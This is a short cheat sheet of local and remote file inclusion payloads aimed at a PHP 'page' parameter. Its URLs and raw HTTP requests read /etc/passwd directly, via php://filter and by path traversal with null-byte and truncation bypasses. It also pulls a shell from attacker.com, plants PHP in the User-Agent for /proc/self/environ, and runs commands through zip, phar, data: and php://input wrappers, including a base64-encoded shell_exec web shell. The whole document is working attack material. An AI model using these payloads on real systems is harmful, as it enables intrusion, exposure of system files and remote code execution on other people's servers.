1. Direct File Include:
http://site.com/lfi.php?page=/etc/passwd
http://www.site.com/rfi.php?page=http://attacker.com/shell.txt
2. php://filter:
http://www.site.com/lfi.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
3. /proc/self/environ:
GET /lfi.php?page=/proc/self/environ&c=id HTTP/1.1
Host: www.site.com
User-Agent: <?php echo shell($_GET['c']);?>
4. Zip and Phar wrappers:
http://www.site.com/lfi.php?page=zip://image.zip#shell.php
http://www.site.com/lfi.php?page=phar://image.phar#shell.php
5. Data:text/plain:
http://www.site.com/lfi.php?page=data:text/plain;base64,PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4=
POST /lfi.php?page=php://input&c=cd HTTP/1.1
Host: www.site.com
Content-Lenth: 37
<?php echo shell_exec($_GET['c']);?>
7. Null Bytes:
http://www.site.com/lfi.php?page=/etc/passwd%00
8. Truncation:
http://www.site.com/lfi.php?page=../../../../../../../../../../../../etc/passwd
http://www.site.com/lfi.php?page=/etc/passwd.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
